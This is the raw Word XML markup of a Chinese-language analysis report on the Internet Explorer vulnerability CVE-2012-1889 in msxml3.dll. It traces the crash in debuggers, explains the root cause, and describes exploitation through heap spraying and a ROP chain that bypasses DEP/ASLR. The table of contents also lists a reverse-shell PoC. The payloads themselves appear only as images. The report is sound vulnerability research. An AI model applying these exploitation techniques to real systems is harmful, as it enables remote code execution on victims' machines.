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7239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jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:sz w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="44"/>
            </w:rPr>
            <w:t>北京蓝森科技有限公司</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:sz w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="32"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>IE浏览器</w:t>
          </w:r>
          <w:bookmarkStart w:id="40" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="40"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="32"/>
            </w:rPr>
            <w:t>（</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
              <w:b/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="000000"/>
              <w:spacing w:val="0"/>
              <w:sz w:val="31"/>
              <w:szCs w:val="31"/>
              <w:shd w:val="clear" w:fill="FFFFFF"/>
            </w:rPr>
            <w:t>cve-2012-1889</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="32"/>
            </w:rPr>
            <w:t>）漏洞分析报告</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="21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4148"/>
            <w:gridCol w:w="414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4148" w:type="dxa"/>
              </w:tcPr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软件名称：IE浏览器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软件版本：6.0/8.0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漏洞模块：msxml3.dll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模块版本：2.0.0.0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r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                  <w:t>编译日期：2008-04-14</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4148" w:type="dxa"/>
              </w:tcPr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操作系统：Windows XP/2003/7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漏洞编号：CVE-2012-1889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危害等级：高危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漏洞类型：缓冲区溢出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r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia"/>
                  </w:rPr>
                  <w:t>威胁类型：远程</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p/>
        <w:p/>
        <w:p/>
        <w:p/>
        <w:p/>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
              <w:b/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="24"/>
            </w:rPr>
            <w:t>分析人：</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>张海龙</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>21</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>年1月</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>日</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:eastAsia="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:id w:val="-1419936660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="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:p>
              <w:pPr>
                <w:pStyle w:val="30"/>
                <w:rPr>
                  <w:lang w:val="zh-CN"/>
                </w:rPr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_Toc20825 </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="39"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>1 前言</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc20825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_Toc22633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 w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="31"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>1.1 cve-2012-1889</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc22633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_Toc11391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 w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="31"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>1.2 环境和工具</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc11391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_Toc11867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39"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>2 poc 复现现场</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc11867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_Toc16540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2.1 调试器收集poc崩溃现场信息</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc16540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_Toc19404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2.2 windbg分析现场</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc19404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_Toc2061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2.3 使用IDA静态分析所在模块</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc2061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_Toc3785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39"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>3 漏洞分析</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc3785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_Toc2377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3.1 动态分析漏洞成因</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc2377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_Toc27164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3.2 漏洞成因分析：栈空间复用原因</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc27164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_Toc8540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3.3 动态分析definition作为方法和作为属性的区别</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc8540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_Toc20069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3.4 分析关键分支条件 [edi + 8] 的意义</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc20069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_Toc28445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39"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>4 漏洞利用</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc28445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_Toc29936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4.1 图解堆喷(原创)</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc29936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_Toc19762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4.2 图解DEP/ALSR 下的堆喷/精准堆喷(原创)</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc19762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_Toc25135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4.3 分析当前漏洞现场</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc25135 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_Toc31009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4.4 构建 Rop (原创)</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc31009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_Toc25854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default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="27"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>4.5 实现精准堆喷</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc25854 </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r>
                <w:t>15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_Toc14335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 w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="31"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>4.6 构建poc 实现反弹shell</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc14335 </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r>
                <w:t>16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_Toc16672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 w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                  <w:i w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:spacing w:val="0"/>
                  <w:szCs w:val="45"/>
                  <w:shd w:val="clear" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>5 查看exp结果</w:t>
              </w:r>
              <w:r>
                <w:tab/>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> PAGEREF _Toc16672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62"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8312"/>
                </w:tabs>
                <w:ind w:left="0" w:leftChars="0"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:bCs/>
                  <w:lang w:val="zh-CN"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
              <w:bookmarkStart w:id="0" w:name="_Toc11353"/>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="C5C5C5" w:sz="6" w:space="8"/>
          <w:right w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0" w:line="273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</w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc20825"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>1 前言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1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05" w:beforeAutospacing="0" w:after="225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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc22633"/>
      <w:bookmarkStart w:id="3" w:name="_Toc31998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1.1 cve-2012-1889</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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cve-2012-1889即是“暴雷”的编号，影响范围广，危害级别高。Microsoft XML CoreServices 3.0~6.0版本中存在漏洞，该漏洞源于访问未初始化内存的位置。远程攻击者可借助特制的web站点利用该漏洞执行任意代码或导致拒绝服务。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05" w:beforeAutospacing="0" w:after="225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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc28151"/>
      <w:bookmarkStart w:id="5" w:name="_Toc1139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1.2 环境和工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5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系统环境：win7 32 + IE 8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工具：WinDbg、OllyDbg、X32Dbg、010Editor </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="C5C5C5" w:sz="6" w:space="8"/>
          <w:right w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0" w:line="273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</w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc11393"/>
      <w:bookmarkStart w:id="7" w:name="_Toc11867"/>
      <w:r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  <w:t>2 poc 复现现场</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7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8" w:name="_Toc19955"/>
      <w:bookmarkStart w:id="9" w:name="_Toc16540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2.1 调试器收集poc崩溃现场信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9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3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 1" descr="1569133796935[4]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1569133796935[4]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 可以看到，eax是0x0c0c0c0c，而eax来自于[ebp+28],也就是栈已经被污染了，已经栈被poc中的0c0c0c0c覆盖了。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10" w:name="_Toc19404"/>
      <w:bookmarkStart w:id="11" w:name="_Toc24096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2.2 windbg分析现场</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11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使用windbg 获取现场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676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10" name="图片 2" descr="1569136792211[4]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1569136792211[4]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查看堆栈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828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="图片 3" descr="1569136861659[3]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1569136861659[3]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追溯 eax 的来源：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[ebp-14h]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2466975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="图片 4" descr="1569137158088[3]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1569137158088[3]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 看到eax源于栈的局部变量[ebp-0x14]，这里可以看到所在的模块是msxml3.dll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12" w:name="_Toc27906"/>
      <w:bookmarkStart w:id="13" w:name="_Toc2061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2.3 使用IDA静态分析所在模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13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1. 首先加载符号文件，便于分析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3562350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 5" descr="1569137300941[2]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1569137300941[2]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来到异常所在API分析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这里_dispatchImpl::InvokeHelper() 调用了一个子函数 sub_7284E15F()，异常的现场在sub_7284E15F()里面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u w:val="single"/>
          <w:bdr w:val="single" w:color="auto" w:sz="12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4857750" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 6" descr="1569139109701[2]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569139109701[2]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追溯 ebp-0x14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4857750" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8" name="图片 7" descr="1569139556011[2]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1569139556011[2]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可以看到 这里ebp-0x1c作为参数传入、__imp__ VariantInit() 初始化。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猜想 是这里影响了ebp -0x14。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="C5C5C5" w:sz="6" w:space="8"/>
          <w:right w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0" w:line="273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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc3785"/>
      <w:bookmarkStart w:id="15" w:name="_Toc27473"/>
      <w:r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  <w:t>3 漏洞分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15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16" w:name="_Toc29679"/>
      <w:bookmarkStart w:id="17" w:name="_Toc2377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3.1 动态分析漏洞成因</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17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根据前面分析 可能是VariantInit()那里除了问题，但是查看资料后发现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6610350" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 8" descr="1569139915565[2]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1569139915565[2]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即 使用VariantInit初始化类型为VARIANTARG（或VARIANT）的新局部变量.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而 VARIANT是 16个字节，也就是ebp-0x1c~ebp-0xc ，所以的确可能初始化了。但是并没有传递数据源啊啊，怎么初始化？在这种挣扎之下于是动手下断点动态调试看看。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这里使用x32dbg 调试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&gt; bp 6548e170 // call ds:__imp__VariantInit@4 ; VariantInit(x)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6419850" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19" name="图片 9" descr="1569141081111[2]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1569141081111[2]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 可以看到在调用 VariantInit() 之前 栈空间就已经被覆盖填充了，所以可以得出这些栈上的数据应该是之前其他函数用完释放的，故这个漏洞是个类似Use-after-free（UAF）漏洞。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再来观察poc， 这些栈数据 都是正常申请的。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762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="图片 10" descr="1569141706438[2]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1569141706438[2]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既然这些都很正常，那问题来了，矛头都指向了 “ 为什么会复用栈空间？”。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18" w:name="_Toc27164"/>
      <w:bookmarkStart w:id="19" w:name="_Toc544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3.2 漏洞成因分析：栈空间复用原因</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19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 xml:space="preserve">看到poc 脚本最后 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257800" cy="323850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 11" descr="1569142253170[2]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1569142253170[2]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 xml:space="preserve">查看MSDN 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06558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Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="065588"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms764733(v=vs.85)?redirectedfrom=MSDN" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="06558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25"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="065588"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms764733(v=vs.85)?redirectedfrom=MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="06558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发现 这是一个属性，而不是一个方法。所以应该是这里发生了错误。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仔细查看invokeHelper() 可以发现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1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 12" descr="1569144331643[2]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1569144331643[2]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跳转到：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781050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="图片 13" descr="1569144467619[2]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1569144467619[2]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跳转到：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2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="图片 14" descr="1569144559475[2]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1569144559475[2]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[edi+8] 的值决定着此函数的走向。当 [edi+8] &gt; 0 的时候 这个跳转就会导向触发漏洞。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20" w:name="_Toc8540"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1890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3.3 动态分析definition作为方法和作为属性的区别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21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前面知道 [edi+8] 的值决定着程序是否正常，那就在此下断点，动态调试分析作为方法和属性的区别。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当作为方法调用的时候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2933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 15" descr="1569144262684[2]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1569144262684[2]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当作为方法的时候 [edi + 8] =1.即会跳转到异常分支触发漏洞。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  <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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当作为属性的时候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3743325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23" name="图片 16" descr="1569144964750[2]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1569144964750[2]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作为属性的时候此值为0.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22" w:name="_Toc12365"/>
      <w:bookmarkStart w:id="23" w:name="_Toc20069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3.4 分析关键分支条件 [edi + 8] 的意义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23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3228975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21" name="图片 17" descr="1569150994283[2]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1569150994283[2]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edi = [ebp +arg_14] , 而 [ebp +arg_14] 是一个 struct tagDISPPARAMS*，通过而tagDISPPARAMS 的结构体如下：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1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="图片 18" descr="1569151127219[2]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1569151127219[2]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所以 [edi +8]= cArgs ，即参数的个数。当有参数的时候 这个漏洞就会触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="C5C5C5" w:sz="6" w:space="8"/>
          <w:right w:val="none" w:color="C5C5C5" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:before="420" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0" w:line="273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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="25" w:name="_Toc29413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1F0909"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4 漏洞利用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25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只要 把最难的win7 IE8 的DEP 和ALSR 给过掉，那么 IE6 和 win xp IE8 就很easy了。这里由于篇幅限制，就不一个一个实战了，直接来最硬的。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26" w:name="_Toc29936"/>
      <w:bookmarkStart w:id="27" w:name="_Toc31944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4.1 图解堆喷(原创)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27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(若发现网上雷同图，系我的博客)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3876675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="图片 19" descr="1569154785298[2]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1569154785298[2]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28" w:name="_Toc3338"/>
      <w:bookmarkStart w:id="29" w:name="_Toc19762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4.2 图解DEP/ALSR 下的堆喷/精准堆喷(原创)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29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(若发现网上雷同图，系我的博客)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4010025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28" name="图片 20" descr="1569154849923[2]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1569154849923[2]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解释： xxx.dll 是我们构造rop （ret2libc）链借助的模块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30" w:name="_Toc25135"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10674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4.3 分析当前漏洞现场</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31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2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="29" name="图片 21" descr="1569154970190[2]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1569154970190[2]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归纳精简上述过程：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1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="图片 22" descr="1569155018500[2]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1569155018500[2]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分析：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默认情况下，我们选择0x0c0c0c0c或者0x0d0d0d0d等作为堆喷地点 (即栈溢出覆盖成0x0c0c0c0c或0x0d0d0d0d)。 但是DEP的情况下，我们需要用Xchg eax,esp;ret地址将当前堆空间的 指令序列给esp才能结合[xx...;]ret;执行我们的rop链，在rop链改变 当前所在堆内存保护属性后，即绕过了DEP这时就能直接将EIP给我们的 堆空间里面代码了。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1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="27" name="图片 23" descr="1569155152474[2]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1569155152474[2]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即 我们只需要这几句就能利用：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1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
